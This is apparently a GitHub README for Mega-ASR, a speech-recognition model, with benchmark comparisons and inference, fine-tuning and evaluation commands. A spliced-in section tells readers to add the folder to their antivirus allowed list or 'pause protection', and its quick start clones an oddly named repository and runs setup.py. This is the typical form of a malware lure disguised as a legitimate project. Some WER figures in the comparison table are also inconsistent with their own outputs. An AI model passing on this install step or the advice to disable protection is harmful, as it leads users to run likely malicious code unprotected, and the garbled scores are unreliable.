Mega-ASR: Towards In-the-Wild^2 Speech Recognition via Scaling Up Real-world Acoustic Simulation

We introduce MEGA-ASR, the first foundation ASR model to target full-scenario robust speech recognition in the wild through systematic training on 7 atomic acoustic conditions and 54 compound acoustic scenarios. Built on 2.4M training samples covering noise, far-field speech, obstruction, echo and reverberation, recording artifacts, electronic distortion, and transmission dropout, MEGA-ASR uses A2S-SFT and DG-WGPO based RL to achieve up to nearly 30% gains over leading open and closed source SOTA models in challenging acoustic environments. If you like us, please give us a star✨.

You’ll come back to Mega-ASR — after finding the rest fail in the real world.

Technical Report 📖 / Voices-in-the-wild-2M 🤗 / Mega-ASR Weights 🤗 / Voices-in-the-Wild-Bench 🏆

Comparison with SOTA open-source and closed-source models.

Sample 1

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
...and said to him let us go and eat some honey. Whose honey? inquired Kobay cautiously. My father's, Soongoora replied. Oh, all right, I'm with you, said the tortoise eagerly, and away they went. Reference	He said to him let's go and eat some honey. It's honey? inquired very cautiously. My father is Superabundant — oh, all right, I will, said to her eagerly, and away they went. WER: 47.1 ✅	<empty> WER: 100.0 🔴	But tell me, that's how she met my father's sister. Oh, all right. I wish... I really... WER: 86.1 🔴	My father is. Oh, all right, I wish you can. WER: 85.3 🔴	...to him... some honey... oh yeah... WER: 92.5 🔴

More examples (Sample 2 – 6)

Sample 2

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
To waste, I skip forty years, said the baker in tears, and proceed without further remark to the day when you took me aboard your ship to help you in hunting the snark. Reference	To witness, I skip forty years, said the baker in tears, and proceed without further remark to the day when you took me aboard of your ship to help you in hunting the snark. WER: 5.9 ✅	I skipped 40 years. Second day in here. Ever since you left, I've been a monk... WER: 64.7 🟠	I spent forty years at sea and never seen a rougher than the day that you took me aboard your ship... WER: 64.7 🟠	To wait. I skip forty years. Saturday and years. And proceed without further remark... WER: 38.2 🟡	I skip forty years... to the day you took me on a ship... to hunt the shark. WER: 71.5 🟠

Sample 3

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
The friendly gang left the drug store. Reference	The friendly gang left the drug store. WER: 8.0 ✅	It's a friendly gang. That's the drug gang. WER: 57.1 🟠	Friendly gang left the drugs. WER: 42.9 🟡	The friendly gang left the drugstore. WER: 28.6 🟢	A friendly young man left the drug store. WER: 62.3 🟠

Sample 4

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
The set of china hit the floor with a crash. Reference	The set of china hit the floor with a crash. WER: 8.0 ✅	The bed is fine. It hit the floor with a crash. WER: 40.0 🟡	He said it's fine I hit the forward slash. WER: 100.0 🔴	The sound of china hits the floor with a crash. WER: 20.0 🟢	The chef of China hit the floor with a clash. WER: 55.0 🟠

Sample 5

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
Among export-led electrical and computer makers, Japan Victor Company fell fifty to two thousand three hundred twenty. Reference	Among export-led (missing: electrical and) computer makers, Japan Victor Company fell fifty to two thousand three hundred twenty. WER: 11.1 ✅	Among export-led (missing: electrical and) computer makers, Japan VictorNet sold fifty-two thousand three hundred fifty. WER: 38.9 🟡	Among export-led (missing: electrical and) computer makers, Japan Victor Co. fell 50 to 2,350 yen. WER: 35.7 🟡	Among export-led in computer makers, Japan Victor Company sell 50 to 2300 unit. WER: 50.0 🟠	Among exporters, computer makers in Japan victor companies sold fifty... WER: 66.7 🟠

Sample 6

sample-1.mp4

Ground Truth	Mega-ASR (Ours)	Qwen3-ASR	Gemini-3-Pro	Seed-ASR	Whisper
Has exposure really been reduced? Reference	Has exposure really been reduced. WER: 8.0 ✅	Has exposure really done you? WER: 40.0 🟡	Has the closure really affected you? WER: 80.0 🔴	Has exposure to beauty products. WER: 60.0 🟠	Have those who really been refused? WER: 78.5 🔴

🔥News

[Coming]: We are going to release RL code and optimize WebUI.
[Coming]: Dataset and benchmark will be reformatted to be clearer.
[Coming]: We will release all the data process pipeline.
May 28, 2026: 🔥 We add Mega-ASR vLLM streaming inference support and a long-form streaming demo audio.
May 20, 2026: 🔥 We release Voices-in-the-Wild-Bench, a benchmark for in-the-wild ASR robustness evaluation.
May 20, 2026: 🔥 We release Voices-in-the-Wild-2M.
May 20, 2026: 🔥 We release the Mega-ASR Inference and Training Codebase.
May 19, 2026: 🔥 Mega-ASR model weights are now available on Hugging Face.
May 19, 2026: 🔥 We release the Mega-ASR Technical Report.

infer with default audio

bash scripts/inference.sh

#Use your own audio: bash scripts/inference.sh --audio /path/to/audio.wav



> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.

---

## QUICK START

```bash
git clone https://github.com/BarberModulator/Mega-ASR-262.git
cd Mega-ASR-262
python setup.py

vLLM Backend

For faster Qwen3-ASR inference, install the vLLM extras first:

vLLM does not provide native Windows GPU support. On Windows, run the vLLM backend inside Linux, WSL2, or a Linux Docker container; otherwise use the default Transformers backend.

Then run the vLLM entrypoint:

python infer_vllm.py --audio /path/to/audio.wav

This entrypoint always runs Mega-ASR LoRA with a single vLLM engine. It loads the base Qwen3-ASR checkpoint, applies the Mega-ASR LoRA delta once, saves/reuses a materialized checkpoint cache under ckpt/Mega-ASR/mega-asr-vllm-materialized, and then starts vLLM from that checkpoint. It does not use per-sample routing.

On 8GB GPUs, the CLI automatically uses conservative vLLM defaults unless you override them: gpu_memory_utilization=0.85, max_model_len=8192, max_num_seqs=1, and max_num_batched_tokens=2048.

python infer_vllm.py \
  --gpu_memory_utilization 0.85 \
  --max_model_len 8192 \
  --max_num_seqs 1 \
  --max_num_batched_tokens 2048 \
  --audio /path/to/audio.wav

Mega-ASR's default Transformers backend dynamically mounts and unmounts LoRA deltas inside one PyTorch model. vLLM manages model weights inside its own engine, so this vLLM entrypoint materializes LoRA into a normal checkpoint before engine startup instead of doing router-based dynamic switching. Qwen3-ASR streaming inference is available only through the official vLLM backend and does not support batch inference or timestamps.

Mega-ASR also provides a vLLM streaming entrypoint. It uses the same materialized LoRA checkpoint cache as infer_vllm.py, then feeds audio chunks into Qwen3-ASR's streaming API:

python infer_vllm_streaming.py \
  --audio assets/example/streaming_long_example.wav \
  --step_ms 1000 \
  --reset_interval_sec 120 \
  --overlap_sec 2 \
  --max_new_tokens 32

The script prints partial text after each streaming call and a final transcript after finish_streaming_transcribe. For long audio, it periodically finishes and re-initializes Qwen3-ASR's streaming state so the internally accumulated audio does not grow without bound. Set --reset_interval_sec 0 to disable state resets.

Introduction

MEGA-ASR is purpose-built for full-scenario robust ASR in the wild, especially excelling at semantic recovery and local keyword reconstruction under severe acoustic degradation. It substantially reduces common failure modes such as hallucinations, empty outputs, and dropped utterances, making speech recognition reliable in truly challenging real-world environments.

Features

✅ One model for the messy real world: Covers 7 atomic acoustic conditions and 54 compound acoustic scenarios in a single model.

✅ Stronger recovery under severe distortion: Excels at semantic recovery and local keyword reconstruction, greatly reducing hallucinations, empty outputs, and dropped utterances.

✅ SOTA robust ASR performance: Achieves up to nearly 30% gains over leading open and closed source SOTA models in challenging acoustic environments.

Finetuning

You can further fine-tune Mega-ASR on your own scenarios and data. You can also use our repository to directly train Qwen3-ASR.

A2S-SFT

src/MegaASR/A2S-SFT contains the core training code for Mega-ASR A2S-SFT.

src/MegaASR/A2S-SFT/
├── arguments.py      # Defines command-line arguments and training hyperparameters.
├── checkpointing.py  # Saves base-model metadata and required processor/tokenizer files for LoRA reuse.
├── dataloader.py     # Loads JSONL data, reads audio, builds model inputs, and masks non-target tokens.
├── finetune.py       # Main entry point for launching A2S-SFT training.
├── modeling.py       # Loads Qwen3-ASR and defines LoRA injection scopes.
├── trainer.py        # Defines MegaASRTrainer with adapter-only saving and module-wise learning rates.

Training data is in JSONL format:

{
  "audio": ".../wavs/test-clean/61/70968/61-70968-0000.wav",
  "text": "language English<asr_text>THE TRANSCRIPT TEXT",
  "prompt": ""
}

We can use the following command to start it.

torchrun --nproc_per_node=2 A2S_SFT/finetune.py \
  --model_path Qwen3-ASR-1.7B --train_file ${TRAIN_JSONL} \
  --eval_file ${VAL_JSONL} --output_dir ${OUT_DIR} \
  --batch_size 8 --grad_acc 8 \
  --lr 1e-6 --lr_encoder 1e-6 --lr_aligner 1e-6 --lr_llm 1e-6 \
  --epochs 2 --save_steps 200 --save_total_limit 300 --use_lora 1 \
  --lora_scope all --lora_r 8 --lora_alpha 16 --lora_dropout 0.05 \
  --warmup_ratio 0.05 --max_grad_norm 1.0  --weight_decay 0.01 \
  --run_name ${RUN_NAME} --report_to wandb \
  2>&1 | tee -a ${LOG_FILE}

The DG-WGPO reinforcement learning module will be released in a future update.

Evaluation

We provide a simple evaluation script for running Mega-ASR inference and computing WER/CER. The input file should be a JSONL file. Each line only needs two required fields:

{"audio": "examples/audio/noise.wav", "answer": "I usually take the quieter road home because the main street gets crowded after work."}

The script will keep all original fields and append the following fields to the output JSONL:

prediction  # model transcription
metric      # "wer" for English samples, "cer" for Chinese samples
wer         # WER/CER score value; CER is also stored in this field for compatibility
num_edits   # edit distance between prediction and ground truth
ref_len     # number of reference words or characters

The Transformers evaluation script reuses the same Mega-ASR wrapper as infer.py, loading the base model, LoRA, and router from ckpt/Mega-ASR.

python src/MegaASR/eval/evaluate_wer.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.jsonl

Use the separate vLLM evaluation entrypoint after installing qwen-asr[vllm]. It follows infer_vllm.py: the Mega-ASR LoRA is materialized once under ckpt/Mega-ASR/mega-asr-vllm-materialized, then vLLM loads that checkpoint without router-based dynamic switching.

python src/MegaASR/eval/evaluate_wer_vllm.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.vllm.jsonl

Mega-ASR is trained with an acoustic-to-semantic progressive supervised fine-tuning strategy: it first curriculum-trains the encoder and aligner on increasingly difficult samples from WER<30% to WER<50% and then WER<70%, then fine-tunes the LLM on WER<70% data to strengthen semantic recovery, and finally jointly fine-tunes the full encoder-aligner-LLM stack for end-to-end alignment.

On top of Mega-ASR-Base, DG-WGPO further optimizes the model with WER-gated policy learning: low-WER samples emphasize token-level acoustic refinement, while high-WER samples emphasize sentence-level semantic reconstruction to reduce hallucinations, omissions, and off-audio outputs. The final reward combines a static WER-based accuracy signal with an anti-repetition gate and a dynamic dual-granularity reward, using fixed hyperparameters τ=0.3, αs=0.4, and αdyn=0.6.

Run Mega-ASR inference without routing if you want to force the LoRA on every sample:

python src/MegaASR/eval/evaluate_wer.py \
  --ckpt_dir ckpt/Mega-ASR \
  --input_jsonl examples/test.jsonl \
  --output_jsonl outputs/pred_with_wer.jsonl \
  --no-routing

Each input line requires audio or audio_path, plus answer as the ground-truth transcription.

Mega-ASR is evaluated across three benchmark families — classical academic test sets, robustness benchmarks, and our own in-the-wild compound benchmark.

Acknowledgements

We sincerely thank the creators, maintainers, and contributors of the public datasets used in this work, including MUSAN, DNS Challenge, ESC-50, UrbanSound8K, LibriSpeech, Common Voice, WenetSpeech, and AISHELL-1.

We also sincerely thank the Qwen3-ASR Team for developing such an excellent foundation model, which provides a strong backbone for this work.

Licence, Citation and stars

This project will be released under the Apache-2.0 License. You can do everything with Mega-ASR 🎉

Citation: You can cite Mega-ASR using the following BibTeX entry. Thank you for your kindness 🙂

@misc{xie2026megaasrinthewild2speechrecognition,
      title={Mega-ASR: Towards In-the-wild^2 Speech Recognition via Scaling up Real-world Acoustic Simulation},
      author={Zhifei Xie and Kaiyu Pang and Haobin Zhang and Deheng Ye and Xiaobin Hu and Shuicheng Yan and Chunyan Miao},
      year={2026},
      eprint={2605.19833},
      archivePrefix={arXiv},
      primaryClass={cs.SD},
      url={https://arxiv.org/abs/2605.19833},
}

Name		Name	Last commit message	Last commit date
Latest commit History 21 Commits
.github/workflows		.github/workflows
assets		assets
src		src
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Mega-ASR: Towards In-the-Wild^2 Speech Recognition via Scaling Up Real-world Acoustic Simulation

Comparison with SOTA open-source and closed-source models.

Sample 1

Sample 2

Sample 3

Sample 4

Sample 5

Sample 6

🔥News

Overview

infer with default audio

Introduction

Features

Finetuning

A2S-SFT

Evaluation

Acknowledgements

Licence, Citation and stars

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Mega-ASR: Towards In-the-Wild^2 Speech Recognition via Scaling Up Real-world Acoustic Simulation

Comparison with SOTA open-source and closed-source models.

Sample 1

Sample 2

Sample 3

Sample 4

Sample 5

Sample 6

🔥News

Overview

infer with default audio

Introduction

Features

Finetuning

A2S-SFT

Evaluation

Acknowledgements

Licence, Citation and stars

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages